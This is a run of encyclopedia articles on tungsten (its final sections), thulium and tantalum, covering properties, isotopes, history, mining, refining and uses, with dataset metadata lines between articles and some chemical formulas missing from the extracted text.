or platinum. Metallic tungsten is hypoallergenic, and is harder than gold alloys (though not as hard as tungsten carbide), making it useful for rings that will resist scratching, especially in designs with a brushed finish. Because the density is so similar to that of gold (tungsten is only 0.36% less dense), and its price of the order of one-thousandth, tungsten can also be used in counterfeiting of gold bars, such as by plating a tungsten bar with gold, which has been observed since the 1980s, or taking an existing gold bar, drilling holes, and replacing the removed gold with tungsten rods. The densities are not exactly the same, and other properties of gold and tungsten differ, but gold-plated tungsten will pass superficial tests. Gold-plated tungsten is available commercially from China (the main source of tungsten), both in jewelry and as bars. Electronics Because it retains its strength at high temperatures and has a high melting point, elemental tungsten is used in many high-temperature applications, such as incandescent light bulb, cathode-ray tube, and vacuum tube filaments, heating elements, and rocket engine nozzles. Its high melting point also makes tungsten suitable for aerospace and high-temperature uses such as electrical, heating, and welding applications, notably in the gas tungsten arc welding process (also called tungsten inert gas (TIG) welding). Because of its conductive properties and relative chemical inertness, tungsten is also used in electrodes, and in the emitter tips in electron-beam instruments that use field emission guns, such as electron microscopes. In electronics, tungsten is used as an interconnect material in integrated circuits, between the silicon dioxide dielectric material and the transistors. It is used in metallic films, which replace the wiring used in conventional electronics with a coat of tungsten (or molybdenum) on silicon. The electronic structure of tungsten makes it one of the main sources for X-ray targets, and also for shielding from high-energy radiations (such as in the radiopharmaceutical industry for shielding radioactive samples of FDG). It is also used in gamma imaging as a material from which coded apertures are made, due to its excellent shielding properties. Tungsten powder is used as a filler material in plastic composites, which are used as a nontoxic substitute for lead in bullets, shot, and radiation shields. Since this element's thermal expansion is similar to borosilicate glass, it is used for making glass-to-metal seals. In addition to its high melting point, when tungsten is doped with potassium, it leads to an increased shape stability (compared with non-doped tungsten). This ensures that the filament does not sag, and no undesired changes occur. Tungsten is used in producing vibration motors, also known as mobile vibrators. These motors are integral components that provide tactile feedback to users, alerting them to incoming calls, messages, and notifications. Tungsten’s high density, hardness, and wear resistance property helps to endure the high-speed rotational vibrations these motors generate. Nanowires Through top-down nanofabrication processes, tungsten nanowires have been fabricated and studied since 2002. Due to a particularly high surface to volume ratio, the formation of a surface oxide layer and the single crystal nature of such material, the mechanical properties differ fundamentally from those of bulk tungsten. Such tungsten nanowires have potential applications in nanoelectronics and importantly as pH probes and gas sensors. In similarity to silicon nanowires, tungsten nanowires are frequently produced from a bulk tungsten precursor followed by a thermal oxidation step to control morphology in terms of length and aspect ratio. Using the Deal–Grove model it is possible to predict the oxidation kinetics of nanowires fabricated through such thermal oxidation processing. Fusion power Due to its high melting point and good erosion resistance, tungsten is a lead candidate for the most exposed sections of the plasma-facing inner wall of nuclear fusion reactors. Tungsten, as a plasma-facing component material, features exceptionally low tritium retention through co-deposition and implantation, which enhances safety by minimizing radioactive inventory, improves fuel efficiency by making more fuel available for fusion reactions, and supports operational continuity by reducing the need for frequent fuel removal from surfaces. It will be used as the plasma-facing material of the divertor in the ITER reactor, and is currently in use in the JET test reactor. Biological role Tungsten, at atomic number Z = 74, is the heaviest element known to be biologically functional. It is used by some bacteria and archaea, but not in eukaryotes. For example, enzymes called oxidoreductases use tungsten similarly to molybdenum by using it in a tungsten-pterin complex with molybdopterin (molybdopterin, despite its name, does not contain molybdenum, but may complex with either molybdenum or tungsten in use by living organisms). Tungsten-using enzymes typically reduce carboxylic acids to aldehydes. The tungsten oxidoreductases may also catalyse oxidations. The first tungsten-requiring enzyme to be discovered also requires selenium, and in this case the tungsten-selenium pair may function analogously to the molybdenum-sulfur pairing of some molybdopterin-requiring enzymes. One of the enzymes in the oxidoreductase family which sometimes employ tungsten (bacterial formate dehydrogenase H) is known to use a selenium-molybdenum version of molybdopterin. Acetylene hydratase is an unusual metalloenzyme in that it catalyzes a hydration reaction. Two reaction mechanisms have been proposed, in one of which there is a direct interaction between the tungsten atom and the C≡C triple bond. Although a tungsten-containing xanthine dehydrogenase from bacteria has been found to contain tungsten-molydopterin and also non-protein bound selenium, a tungsten-selenium molybdopterin complex has not been definitively described. In soil, tungsten metal oxidizes to the tungstate anion. It can be selectively or non-selectively imported by some prokaryotic organisms and may substitute for molybdate in certain enzymes. Its effect on the action of these enzymes is in some cases inhibitory and in others positive. The soil's chemistry determines how the tungsten polymerizes; alkaline soils cause monomeric tungstates; acidic soils cause polymeric tungstates. Sodium tungstate and lead have been studied for their effect on earthworms. Lead was found to be lethal at low levels and sodium tungstate was much less toxic, but the tungstate completely inhibited their reproductive ability. Tungsten has been studied as a biological copper metabolic antagonist, in a role similar to the action of molybdenum. It has been found that salts may be used as biological copper chelation chemicals, similar to the tetrathiomolybdates. In archaea Tungsten is essential for some archaea. The following tungsten-utilizing enzymes are known: Aldehyde ferredoxin oxidoreductase (AOR) in Thermococcus strain ES-1 Formaldehyde ferredoxin oxidoreductase (FOR) in Thermococcus litoralis Glyceraldehyde-3-phosphate ferredoxin oxidoreductase (GAPOR) in Pyrococcus furiosus A wtp system is known to selectively transport tungsten in archaea: WtpA is tungsten-binding protein of ABC family of transporters WtpB is a permease WtpC is ATPase Health factors Because tungsten is a rare metal and its compounds are generally inert, the effects of tungsten on the environment are limited. The abundance of tungsten in the Earth's crust is thought to be about 1.5 parts per million. It is the 58th most abundant element found on Earth. It was at first believed to be relatively inert and an only slightly toxic metal, but beginning in the year 2000, the risk presented by tungsten alloys, its dusts and particulates to induce cancer and several other adverse effects in animals as well as humans has been highlighted from in vitro and in vivo experiments. The median lethal dose LD50 depends strongly on the animal and the method of administration and varies between 59 mg/kg (intravenous, rabbits) and 5000 mg/kg (tungsten metal powder, intraperitoneal, rats). People can be exposed to tungsten in the workplace by breathing it in, swallowing it, skin contact, and eye contact. The National Institute for Occupational Safety and Health (NIOSH) has set a recommended exposure limit (REL) of 5 mg/m3 over an 8-hour workday and a short term limit of 10 mg/m3. In popular culture Tungsten and tungsten alloys gained popularity through tungsten cubes and spheres. This popularity started in October 2021, and rose again in January 2023, through social media. The main reason that tungsten cubes, spheres and other forms became popular is for their novelty as an item, due to their density. No other element comes close to the same density with regards to cost and availability, with some being radioactive as well.
Physical sciences
Chemical elements_2
null
30047
https://en.wikipedia.org/wiki/Thulium
Thulium
Thulium is a chemical element; it has symbol Tm and atomic number 69. It is the thirteenth element in the lanthanide series of metals. It is the second-least abundant lanthanide in the Earth's crust, after radioactively unstable promethium. It is an easily workable metal with a bright silvery-gray luster. It is fairly soft and slowly tarnishes in air. Despite its high price and rarity, thulium is used as a dopant in solid-state lasers, and as the radiation source in some portable X-ray devices. It has no significant biological role and is not particularly toxic. In 1879, the Swedish chemist Per Teodor Cleve separated two previously unknown components, which he called holmia and thulia, from the rare-earth mineral erbia; these were the oxides of holmium and thulium, respectively. A relatively pure sample of thulium metal was first obtained in 1911. Like the other lanthanides, its most common oxidation state is +3, seen in its oxide, halides and other compounds. In aqueous solution, like compounds of other late lanthanides, soluble thulium compounds form coordination complexes with nine water molecules. Properties Physical properties Pure thulium metal has a bright, silvery luster, which tarnishes on exposure to air. The metal can be cut with a knife, as it has a Mohs hardness of 2 to 3; it is malleable and ductile. Thulium is ferromagnetic below 32K, antiferromagnetic between 32 and 56K, and paramagnetic above 56K. Thulium has two major allotropes: the tetragonal α-Tm and the more stable hexagonal β-Tm. Chemical properties Thulium tarnishes slowly in air and burns readily at 150°C to form thulium(III) oxide: Thulium is quite electropositive and reacts slowly with cold water and quite quickly with hot water to form thulium hydroxide: Thulium reacts with all the halogens. Reactions are slow at room temperature, but are vigorous above 200°C: (white) (yellow) (white) (yellow) Thulium dissolves readily in dilute sulfuric acid to form solutions containing the pale green Tm(III) ions, which exist as complexes: Thulium reacts with various metallic and non-metallic elements forming a range of binary compounds, including , , , , , , , , , and . Like most lanthanides, the +3 state is most common and is the only state observed in thulium solutions. Thulium exists as a ion in solution. In this state, the thulium ion is surrounded by nine molecules of water. ions exhibit a bright blue luminescence. Because it occurs late in the series, the +2 oxidation state can also exist, stabilized by the nearly full 4f electron shell, but occurs only in solids. Thulium's only known oxide is . This oxide is sometimes called "thulia". Reddish-purple thulium(II) compounds can be made by the reduction of thulium(III) compounds. Examples of thulium(II) compounds include the halides (except the fluoride). Some hydrated thulium compounds, such as and are green or greenish-white. Thulium dichloride reacts very vigorously with water. This reaction results in hydrogen gas and exhibiting a fading reddish color. Combination of thulium and chalcogens results in thulium chalcogenides. Thulium reacts with hydrogen chloride to produce hydrogen gas and thulium chloride. With nitric acid it yields thulium nitrate, or . Isotopes The isotopes of thulium range from to . The primary decay mode before the most abundant stable isotope, , is electron capture, and the primary mode after is beta emission. The primary decay products before are element 68 (erbium) isotopes, and the primary products after are element 70 (ytterbium) isotopes. Thulium-169 is thulium's only primordial isotope and is the only isotope of thulium that is thought to be stable; it is predicted to undergo alpha decay to holmium-165 with a very long half-life. The longest-lived radioisotopes are thulium-171, which has a half-life of 1.92 years, and thulium-170, which has a half-life of 128.6 days. Most other isotopes have half-lives of a few minutes or less. In total, 40 isotopes and 26 nuclear isomers of thulium have been detected. Most isotopes of thulium lighter than 169 atomic mass units decay via electron capture or beta-plus decay, although some exhibit significant alpha decay or proton emission. Heavier isotopes undergo beta-minus decay. History Thulium was discovered by Swedish chemist Per Teodor Cleve in 1879 by looking for impurities in the oxides of other rare earth elements (this was the same method Carl Gustaf Mosander earlier used to discover some other rare earth elements). Cleve started by removing all of the known contaminants of erbia (). Upon additional processing, he obtained two new substances; one brown and one green. The brown substance was the oxide of the element holmium and was named holmia by Cleve, and the green substance was the oxide of an unknown element. Cleve named the oxide thulia and its element thulium after Thule, an Ancient Greek place name associated with Scandinavia or Iceland. Thulium's atomic symbol was initially Tu, but later changed to Tm. Thulium was so rare that none of the early workers had enough of it to purify sufficiently to actually see the green color; they had to be content with spectroscopically observing the strengthening of the two characteristic absorption bands, as erbium was progressively removed. The first researcher to obtain nearly pure thulium was Charles James, a British expatriate working on a large scale at New Hampshire College in Durham, USA. In 1911 he reported his results, having used his discovered method of bromate fractional crystallization to do the purification. He famously needed 15,000 purification operations to establish that the material was homogeneous. High-purity thulium oxide was first offered commercially in the late 1950s, as a result of the adoption of ion-exchange separation technology. Lindsay Chemical Division of American Potash & Chemical Corporation offered it in grades of 99% and 99.9% purity. The price per kilogram oscillated between US$4,600 and $13,300 in the period from 1959 to 1998 for 99.9% purity, and it was the second highest for the lanthanides behind lutetium. Occurrence The element is never found in nature in pure form, but it is found in small quantities in minerals with other rare earths. Thulium is often found with minerals containing yttrium and gadolinium. In particular, thulium occurs in the mineral gadolinite. However, like many other lanthanides, thulium also occurs in the minerals monazite, xenotime, and euxenite. Thulium has not been found in prevalence over the other rare earths in any mineral yet. Its abundance in the Earth's crust is 0.5 mg/kg by weight. Thulium makes up approximately 0.5 parts per million of soil, although this value can range from 0.4 to 0.8 parts per million. Thulium makes up 250 parts per quadrillion of seawater. In the Solar System, thulium exists in concentrations of 200 parts per trillion by weight and 1 part per trillion by moles. Thulium ore occurs most commonly in China. However, Australia, Brazil, Greenland, India, Tanzania, and the United States also have large reserves of thulium. Total reserves of thulium are approximately 100,000 tonnes. Thulium is the least abundant lanthanide on Earth except for the radioactive promethium. Production Thulium is principally extracted from monazite ores (~0.007% thulium) found in river sands, through ion exchange. Newer ion-exchange and solvent-extraction techniques have led to easier separation of the rare earths, which has yielded much lower costs for thulium production. The principal sources today are the ion adsorption clays of southern China. In these, where about two-thirds of the total rare-earth content is yttrium, thulium is about 0.5% (or about tied with lutetium for rarity). The metal can be isolated through reduction of its oxide with lanthanum metal or by calcium reduction in a closed container. None of thulium's natural compounds are commercially important. Approximately 50 tonnes per year of thulium oxide are produced. In 1996, thulium oxide cost US$20 per gram, and in 2005, 99%-pure thulium metal powder cost US$70 per gram. Applications Lasers Holmium-chromium-thulium triple-doped yttrium aluminium garnet (, or ) is an active laser medium material with high efficiency. It lases at 2080 nm in the infrared and is widely used in military applications, medicine, and meteorology. Single-element thulium-doped YAG (Tm:YAG) lasers operate at 2010 nm. The wavelength of thulium-based lasers is very efficient for superficial ablation of tissue, with minimal coagulation depth in air or in water. This makes thulium lasers attractive for laser-based surgery. X-ray source Despite its high cost, portable X-ray devices use thulium that has been bombarded with neutrons in a nuclear reactor to produce the isotope Thulium-170, having a half-life of 128.6 days and five major emission lines of comparable intensity (at 7.4, 51.354, 52.389, 59.4 and 84.253 keV). These radioactive sources have a useful life of about one year, as tools in medical and dental diagnosis, as well as to detect defects in inaccessible mechanical and electronic components. Such sources do not need extensive radiation protectiononly a small cup of lead. They are among the most popular radiation sources for use in industrial radiography. Thulium-170 is gaining popularity as an X-ray source for cancer treatment via brachytherapy (sealed source radiation therapy). Others Thulium has been used in high-temperature superconductors similarly to yttrium. Thulium potentially has use in ferrites, ceramic magnetic materials that are used in microwave equipment. Thulium is also similar to scandium in that it is used in arc lighting for its unusual spectrum, in this case, its green emission lines, which are not covered by other elements. Because thulium fluoresces with a blue color when exposed to ultraviolet light, thulium is put into euro banknotes as a measure against counterfeiting. The blue fluorescence of Tm-doped calcium sulfate has been used in personal dosimeters for visual monitoring of radiation. Tm-doped halides in which Tm is in its 2+ oxidation state are luminescent materials that are proposed for electric power generating windows based on the principle of a luminescent solar concentrator. Biological role and precautions Soluble thulium salts are mildly toxic, but insoluble thulium salts are completely nontoxic. When injected, thulium can cause degeneration of the liver and spleen and can also cause hemoglobin concentration to fluctuate. Liver damage from thulium is more prevalent in male mice than female mice. Despite this, thulium has a low level of toxicity. In humans, thulium occurs in the highest amounts in the liver, kidneys, and bones. Humans typically consume several micrograms of thulium per year. The roots of plants do not take up thulium, and the dry matter of vegetables usually contains one part per billion of thulium. Thulium is toxic. Thulium dust can cause explosions and fires.
Physical sciences
Chemical elements_2
null
30048
https://en.wikipedia.org/wiki/Tantalum
Tantalum
Tantalum is a chemical element; it has symbol Ta and atomic number 73. It is named after Tantalus, a figure in Greek mythology. Tantalum is a very hard, ductile, lustrous, blue-gray transition metal that is highly corrosion-resistant. It is part of the refractory metals group, which are widely used as components of strong high-melting-point alloys. It is a group 5 element, along with vanadium and niobium, and it always occurs in geologic sources together with the chemically similar niobium, mainly in the mineral groups tantalite, columbite and coltan. The chemical inertness and very high melting point of tantalum make it valuable for laboratory and industrial equipment such as reaction vessels and vacuum furnaces. It is used in tantalum capacitors for electronic equipment such as computers. It is being investigated for use as a material for high-quality superconducting resonators in quantum processors. Tantalum is considered a technology-critical element by the European Commission. History Tantalum was discovered in Sweden in 1802 by Anders Ekeberg, in two mineral samples – one from Sweden and the other from Finland. One year earlier, Charles Hatchett had discovered columbium (now niobium). In 1809, the English chemist William Hyde Wollaston compared the oxides of columbium and tantalum, columbite and tantalite. Although the two oxides had different measured densities of 5.918 g/cm3 and 7.935 g/cm3, he concluded that they were identical and kept the name tantalum. After Friedrich Wöhler confirmed these results, it was thought that columbium and tantalum were the same element. This conclusion was disputed in 1846 by the German chemist Heinrich Rose, who argued that there were two additional elements in the tantalite sample, and he named them after the children of Tantalus: niobium (from Niobe), and pelopium (from Pelops). The supposed element "pelopium" was later identified as a mixture of tantalum and niobium, and it was found that the niobium was identical to the columbium already discovered in 1801 by Hatchett. The differences between tantalum and niobium were demonstrated unequivocally in 1864 by Christian Wilhelm Blomstrand, and Henri Etienne Sainte-Claire Deville, as well as by Louis J. Troost, who determined the empirical formulas of some of their compounds in 1865. Further confirmation came from the Swiss chemist Jean Charles Galissard de Marignac, in 1866, who proved that there were only two elements. These discoveries did not stop scientists from publishing articles about the so-called ilmenium until 1871. De Marignac was the first to produce the metallic form of tantalum in 1864, when he reduced tantalum chloride by heating it in an atmosphere of hydrogen. Early investigators had only been able to produce impure tantalum, and the first relatively pure ductile metal was produced by Werner von Bolton in Charlottenburg in 1903. Wires made with metallic tantalum were used for light bulb filaments until tungsten replaced it in widespread use. The name tantalum was derived from the name of the mythological Tantalus, the father of Niobe in Greek mythology. In the story, he had been punished after death by being condemned to stand knee-deep in water with perfect fruit growing above his head, both of which eternally tantalized him. (If he bent to drink the water, it drained below the level he could reach, and if he reached for the fruit, the branches moved out of his grasp.) Anders Ekeberg wrote "This metal I call tantalum ... partly in allusion to its incapacity, when immersed in acid, to absorb any and be saturated." For decades, the commercial technology for separating tantalum from niobium involved the fractional crystallization of potassium heptafluorotantalate away from potassium oxypentafluoroniobate monohydrate, a process that was discovered by Jean Charles Galissard de Marignac in 1866. This method has been supplanted by solvent extraction from fluoride-containing solutions of tantalum. Characteristics Physical properties Tantalum is dark (blue-gray), dense, ductile, very hard, easily fabricated, and highly conductive of heat and electricity. The metal is highly resistant to corrosion by acids: at temperatures below 150 °C tantalum is almost completely immune to attack by the normally aggressive aqua regia. It can be dissolved with hydrofluoric acid or acidic solutions containing the fluoride ion and sulfur trioxide, as well as with molten potassium hydroxide. Tantalum's high melting point of 3017 °C (boiling point 5458 °C) is exceeded among the elements only by tungsten, rhenium and osmium for metals, and carbon. Tantalum exists in two crystalline phases, alpha and beta. The alpha phase is stable at all temperatures up to the melting point and has body-centered cubic structure with lattice constant a = 0.33029 nm at 20 °C. It is relatively ductile, has Knoop hardness 200–400 HN and electrical resistivity 15–60 μΩ⋅cm. The beta phase is hard and brittle; its crystal symmetry is tetragonal (space group P42/mnm, a = 1.0194 nm, c = 0.5313 nm), Knoop hardness is 1000–1300 HN and electrical resistivity is relatively high at 170–210 μΩ⋅cm. The beta phase is metastable and converts to the alpha phase upon heating to 750–775 °C. Bulk tantalum is almost entirely alpha phase, and the beta phase usually exists as thin films obtained by magnetron sputtering, chemical vapor deposition or electrochemical deposition from a eutectic molten salt solution. Isotopes Natural tantalum consists of two stable isotopes: 180mTa (0.012%) and 181Ta (99.988%). 180mTa (m denotes a metastable state) is predicted to decay in three ways: isomeric transition to the ground state of 180Ta, beta decay to 180W, or electron capture to 180Hf. However, radioactivity of this nuclear isomer has never been observed, and only a lower limit on its half-life of 2.9 years has been set. The ground state of 180Ta has a half-life of only 8 hours. 180mTa is the only naturally occurring nuclear isomer (excluding radiogenic and cosmogenic short-lived nuclides). It is also the rarest primordial isotope in the Universe, taking into account the elemental abundance of tantalum and isotopic abundance of 180mTa in the natural mixture of isotopes (and again excluding radiogenic and cosmogenic short-lived nuclides). Tantalum has been examined theoretically as a "salting" material for nuclear weapons (cobalt is the better-known hypothetical salting material). An external shell of 181Ta would be irradiated by the intensive high-energy neutron flux from a hypothetical exploding nuclear weapon. This would transmute the tantalum into the radioactive isotope 182Ta, which has a half-life of 114.4 days and produces gamma rays with approximately 1.12 million electron-volts (MeV) of energy apiece, which would significantly increase the radioactivity of the nuclear fallout from the explosion for several months. Such "salted" weapons have never been built or tested, as far as is publicly known, and certainly never used as weapons. Tantalum can be used as a target material for accelerated proton beams for the production of various short-lived isotopes including 8Li, 80Rb, and 160Yb. Chemical compounds Tantalum forms compounds in oxidation states −III to +V. Most commonly encountered are oxides of Ta(V), which includes all minerals. The chemical properties of Ta and Nb are very similar. In aqueous media, Ta only exhibit the +V oxidation state. Like niobium, tantalum is barely soluble in dilute solutions of hydrochloric, sulfuric, nitric and phosphoric acids due to the precipitation of hydrous Ta(V) oxide. In basic media, Ta can be solubilized due to the formation of polyoxotantalate species. Oxides, nitrides, carbides, sulfides Tantalum pentoxide (Ta2O5) is the most important compound from the perspective of applications. Oxides of tantalum in lower oxidation states are numerous, including many defect structures, and are lightly studied or poorly characterized. Tantalates, compounds containing [TaO4]3− or [TaO3]− are numerous. Lithium tantalate (LiTaO3) adopts a perovskite structure. Lanthanum tantalate (LaTaO4) contains isolated tetrahedra. As in the cases of other refractory metals, the hardest known compounds of tantalum are nitrides and carbides. Tantalum carbide, TaC, like the more commonly used tungsten carbide, is a hard ceramic that is used in cutting tools. Tantalum(III) nitride is used as a thin film insulator in some microelectronic fabrication processes. The best studied chalcogenide is Tantalum sulfide (TaS2), a layered semiconductor, as seen for other transition metal dichalcogenides. A tantalum-tellurium alloy forms quasicrystals. Halides Tantalum halides span the oxidation states of +5, +4, and +3. Tantalum pentafluoride (TaF5) is a white solid with a melting point of 97.0 °C. The anion [TaF7]2- is used for its separation from niobium. The chloride , which exists as a dimer, is the main reagent in synthesis of new Ta compounds. It hydrolyzes readily to an oxychloride. The lower halides and , feature Ta-Ta bonds. Organotantalum compounds Organotantalum compounds include pentamethyltantalum, mixed alkyltantalum chlorides, alkyltantalum hydrides, alkylidene complexes as well as cyclopentadienyl derivatives of the same. Diverse salts and substituted derivatives are known for the hexacarbonyl [Ta(CO)6]− and related isocyanides. Occurrence Tantalum is estimated to make up about 1 ppm or 2 ppm of the Earth's crust by weight. There are many species of tantalum minerals, only some of which are so far being used by industry as raw materials: tantalite (a series consisting of tantalite-(Fe), tantalite-(Mn) and tantalite-(Mg)), microlite (now a group name), wodginite, euxenite (actually euxenite-(Y)), and polycrase (actually polycrase-(Y)). Tantalite (Fe, Mn)Ta2O6 is the most important mineral for tantalum extraction. Tantalite has the same mineral structure as columbite (Fe, Mn) (Ta, Nb)2O6; when there is more tantalum than niobium it is called tantalite and when there is more niobium than tantalum is it called columbite (or niobite). The high density of tantalite and other tantalum containing minerals makes the use of gravitational separation the best method. Other minerals include samarskite and fergusonite. Australia was the main producer of tantalum prior to the 2010s, with Global Advanced Metals (formerly known as Talison Minerals) being the largest tantalum mining company in that country. They operate two mines in Western Australia, Greenbushes in the southwest and Wodgina in the Pilbara region. The Wodgina mine was reopened in January 2011 after mining at the site was suspended in late 2008 due to the global financial crisis. Less than a year after it reopened, Global Advanced Metals announced that due to again "... softening tantalum demand ...", and other factors, tantalum mining operations were to cease at the end of February 2012. Wodgina produces a primary tantalum concentrate which is further upgraded at the Greenbushes operation before being sold to customers. Whereas the large-scale producers of niobium are in Brazil and Canada, the ore there also yields a small percentage of tantalum. Some other countries such as China, Ethiopia, and Mozambique mine ores with a higher percentage of tantalum, and they produce a significant percentage of the world's output of it. Tantalum is also produced in Thailand and Malaysia as a by-product of the tin mining there. During gravitational separation of the ores from placer deposits, not only is cassiterite (SnO2) found, but a small percentage of tantalite also included. The slag from the tin smelters then contains economically useful amounts of tantalum, which is leached from the slag. World tantalum mine production has undergone an important geographic shift since the start of the 21st century when production was predominantly from Australia and Brazil. Beginning in 2007 and through 2014, the major sources of tantalum production from mines dramatically shifted to the Democratic Republic of the Congo, Rwanda, and some other African countries. Future sources of supply of tantalum, in order of estimated size, are being explored in Saudi Arabia, Egypt, Greenland, China, Mozambique, Canada, Australia, the United States, Finland, and Brazil. Status as a conflict resource Tantalum is considered a conflict resource. Coltan, the industrial name for a columbite–tantalite mineral from which niobium and tantalum are extracted, can also be found in Central Africa, which is why tantalum is being linked to warfare in the Democratic Republic of the Congo (formerly Zaire). According to an October 23, 2003 United Nations report, the smuggling and exportation of coltan has helped fuel the war in the Congo, a crisis that has resulted in approximately 5.4 million deaths since 1998 – making it the world's deadliest documented conflict since World War II. Ethical questions have been raised about responsible corporate behavior, human rights, and endangering wildlife, due to the exploitation of resources such as coltan in the armed conflict regions of the Congo Basin. The United States Geological Survey reports in its yearbook that this region produced a little less than 1% of the world's tantalum output in 2002–2006, peaking at 10% in 2000 and 2008. USGS data published in January 2021 indicated that close to 40% of the world's tantalum mine production came from the Democratic Republic of the Congo, with another 18% coming from neighboring Rwanda and Burundi. Production and fabrication Several steps are involved in the extraction of tantalum from tantalite. First, the mineral is crushed and concentrated by gravity separation. This is generally carried out near the mine site. Refining The refining of tantalum from its ores is one of the more demanding separation processes in industrial metallurgy. The chief problem is that tantalum ores contain significant amounts of niobium, which has chemical properties almost identical to those of Ta. A large number of procedures have been developed to address this challenge. In modern times, the separation is achieved by hydrometallurgy. Extraction begins with leaching the ore with hydrofluoric acid together with sulfuric acid or hydrochloric acid. This step allows the tantalum and niobium to be separated from the various non-metallic impurities in the rock. Although Ta occurs as various minerals, it is conveniently represented as the pentoxide, since most oxides of tantalum(V) behave similarly under these conditions. A simplified equation for its extraction is thus: Ta2O5 + 14 HF → 2 H2[TaF7] + 5 H2O Completely analogous reactions occur for the niobium component, but the hexafluoride is typically predominant under the conditions of the extraction. Nb2O5 + 12 HF → 2 H[NbF6] + 5 H2O These equations are simplified: it is suspected that bisulfate (HSO4−) and chloride compete as ligands for the Nb(V) and Ta(V) ions, when sulfuric and hydrochloric acids are used, respectively. The tantalum and niobium fluoride complexes are then removed from the aqueous solution by liquid-liquid extraction into organic solvents, such as cyclohexanone, octanol, and methyl isobutyl ketone. This simple procedure allows the removal of most metal-containing impurities (e.g. iron, manganese, titanium, zirconium), which remain in the aqueous phase in the form of their fluorides and other complexes. Separation of the tantalum from niobium is then achieved by lowering the ionic strength of the acid mixture, which causes the niobium to dissolve in the aqueous phase. It is proposed that oxyfluoride H2[NbOF5] is formed under these conditions. Subsequent to removal of the niobium, the solution of purified H2[TaF7] is neutralised with aqueous ammonia to precipitate hydrated tantalum oxide as a solid, which can be calcined to tantalum pentoxide (Ta2O5). Instead of hydrolysis, the H2[TaF7] can be treated with potassium fluoride to produce potassium heptafluorotantalate: H2[TaF7] + 2 KF → K2[TaF7] + 2 HF Unlike H2[TaF7], the potassium salt is readily crystallized and handled as a solid. K2[TaF7] can be converted to metallic tantalum by reduction with sodium, at approximately 800 °C in molten salt. K2[TaF7] + 5 Na → Ta + 5 NaF + 2 KF In an older method, called the Marignac process, the mixture of H2[TaF7] and H2[NbOF5] was converted to a mixture of K2[TaF7] and K2[NbOF5], which was then separated by fractional crystallization, exploiting their different water solubilities. Electrolysis Tantalum can also be refined by electrolysis, using a modified version of the Hall–Héroult process. Instead of requiring the input oxide and output metal to be in liquid form, tantalum electrolysis operates on non-liquid powdered oxides. The initial discovery came in 1997 when Cambridge University researchers immersed small samples of certain oxides in baths of molten salt and reduced the oxide with electric current. The cathode uses powdered metal oxide. The anode is made of carbon. The molten salt at is the electrolyte. The first refinery has enough capacity to supply 3–4% of annual global demand. Fabrication and metalworking All welding of tantalum must be done in an inert atmosphere of argon or helium in order to shield it from contamination with atmospheric gases. Tantalum is not solderable. Grinding tantalum is difficult, especially so for annealed tantalum. In the annealed condition, tantalum is extremely ductile and can be readily formed as metal sheets. Applications Electronics The major use for tantalum, as the metal powder, is in the production of electronic components, mainly capacitors and some high-power resistors. Tantalum electrolytic capacitors exploit the tendency of tantalum to form a protective oxide surface layer, using tantalum powder, pressed into a pellet shape, as one "plate" of the capacitor, the oxide as the dielectric, and an electrolytic solution or conductive solid as the other "plate". Because the dielectric layer can be very thin (thinner than the similar layer in, for instance, an aluminium electrolytic capacitor), a high capacitance can be achieved in a small volume. Because of the size and weight advantages, tantalum capacitors are attractive for portable telephones, personal computers, automotive electronics and cameras. Alloys Tantalum is also used to produce a variety of alloys that have high melting points, strength, and ductility. Alloyed with other metals, it is also used in making carbide tools for metalworking equipment and in the production of superalloys for jet engine components, chemical process equipment, nuclear reactors, missile parts, heat exchangers, tanks, and vessels. Because of its ductility, tantalum can be drawn into fine wires or filaments, which are used for evaporating metals such as aluminium. Tantalum is inert against most acids except hydrofluoric acid and hot sulfuric acid, and hot alkaline solutions also cause tantalum to corrode. This property makes it a useful metal for chemical reaction vessels and pipes for corrosive liquids. Heat exchanging coils for the steam heating of hydrochloric acid are made from tantalum. Tantalum was extensively used in the production of ultra high frequency electron tubes for radio transmitters. Tantalum is capable of capturing oxygen and nitrogen by forming nitrides and oxides and therefore helped to sustain the high vacuum needed for the tubes when used for internal parts such as grids and plates. Surgical uses Medical researcher Gerald L. Burke at the Los Angeles Orthopaedic Hospital first discovered in 1938 that tantalum is bio-inert in human tissue and could be used safely as an orthopaedic implant material. [] Burke also demonstrated perhaps the other most appreciated characteristic of tantalum in surgical procedures: tantalum would permanently bond to bone with no degradation of the surrounding bone. Later, Burke's team working with a team from the California Institute of Technology led by John Norton Wilson showed that tantalum, while hard enough to be fabricated into surgical tools, could also be fabricated in a form sufficiently ductile, yet still sufficiently strong to be drawn into fine threads that could be used for non-scarring sutures. Burke's team in 1940 was the first to propose the use of tantalum for arthroplasty procedures, the repair of intertrochanteric fractures, and for jaw repairs and dental implants. Burke's initial biological research results were confirmed and credited in greater detail by the Harvard Medical School in a series of neurological experiments using powdered tantalum implants. More than 50 years later, researchers were still refining and documenting their understanding of the basic surgical procedures developed by Burke after his pioneering discoveries. Nowadays, in spite of the cost, tantalum is still widely used in making surgical instruments and implants, and new procedures continue to be developed. For example, porous tantalum coatings are used in the construction of titanium implants due to tantalum's exceptional ability to form a direct bond to hard tissue. Because tantalum is a non-ferrous, non-magnetic metal, tantalum implants are considered to be acceptable for patients undergoing MRI procedures. Other uses Tantalum was used by NASA to shield components of spacecraft, such as Voyager 1 and Voyager 2, from radiation. The high melting point and oxidation resistance led to the use of the metal in the production of vacuum furnace parts. Tantalum is extremely inert and is therefore formed into a variety of corrosion resistant parts, such as thermowells, valve bodies, and tantalum fasteners. Due to its high density, shaped charge and explosively formed penetrator liners have been constructed from tantalum. Tantalum greatly increases the armor penetration capabilities of a shaped charge due to its high density and high melting point. It is also occasionally used in precious watches e.g. from Audemars Piguet, F.P. Journe, Hublot, Montblanc, Omega, and Panerai. Tantalum oxide is used to make special high refractive index glass for camera lenses. Spherical tantalum powder, produced by atomizing molten tantalum using gas or liquid, is commonly used in additive manufacturing due to its uniform shape, excellent flowability, and high melting point. Environmental issues Tantalum receives far less attention in the environmental field than it does in other geosciences. Upper Crust Concentration (UCC) and the Nb/Ta ratio in the upper crust and in minerals are available because these measurements are useful as a geochemical tool. The latest value for upper crust concentration is 0.92 ppm, and the Nb/Ta(w/w) ratio stands at 12.7. Little data is available on tantalum concentrations in the different environmental compartments, especially in natural waters where reliable estimates of ‘dissolved’ tantalum concentrations in seawater and freshwaters have not even been produced. Some values on dissolved concentrations in oceans have been published, but they are contradictory. Values in freshwaters fare little better, but, in all cases, they are probably below 1 ng L−1, since ‘dissolved’ concentrations in natural waters are well below most current analytical capabilities. Analysis requires pre-concentration procedures 